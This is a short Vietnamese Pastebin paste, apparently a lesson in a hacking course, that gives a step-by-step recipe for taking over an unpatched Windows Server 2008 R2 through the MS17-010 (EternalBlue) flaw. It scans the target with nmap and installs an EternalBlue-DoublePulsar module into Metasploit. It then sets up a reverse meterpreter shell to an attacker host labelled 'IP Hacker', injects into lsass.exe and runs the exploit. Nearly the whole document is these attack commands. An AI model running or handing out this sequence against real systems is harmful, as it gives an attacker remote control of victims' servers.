Advertisement
anhkiet2507

Untitled

Aug 6th, 2017
31,576
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.09 KB | None | 0 0
  1. Bài 54: Tấn công chiếm quyền Windows Server 2008 R2 x64 (Khai thác ms17_010)
  2. Command scan lỗ hổng với nmap : nmap -T4 -A -v --script smb-vuln-ms17-010 192.168.1.7
  3. Tiến hành cài đặt moudle khai thác vào Metasploit
  4. apt-get update
  5. apt-get install wine32
  6. git clone https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit.git
  7. copy thư mục deps và file eternal.rb  /usr/share/metasploit-framework/modules/exploits/windows/smb
  8. msfconsole
  9. search eternalblue
  10. use exploit/windows/smb/eternalblue_doublepulsar
  11. set PAYLOAD windows/meterpreter/reverse_tcp (nếu HĐH 64bit thì: windows/x64/meterpreter/reverse_tcp)
  12. set DOUBLEPULSARPATH /usr/share/metasploit-framework/modules/exploits/windows/smb/deps
  13. set ETERNALBLUEPATH /usr/share/metasploit-framework/modules/exploits/windows/smb/deps
  14. show targets
  15. set target 9
  16. set targset WINEPATH /root/
  17. set TARGETARCHITECTURE x86 ( nếu HĐH 64 thì thay x86=x64)
  18. set RHOST IP Victim
  19. set LHOST IP Hacker
  20. set PROCESSINJECT lsass.exe (Nếu máy Victim là HĐH 64bit-Phần lớn các Windows Server là 64 bit)
  21. exploit
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement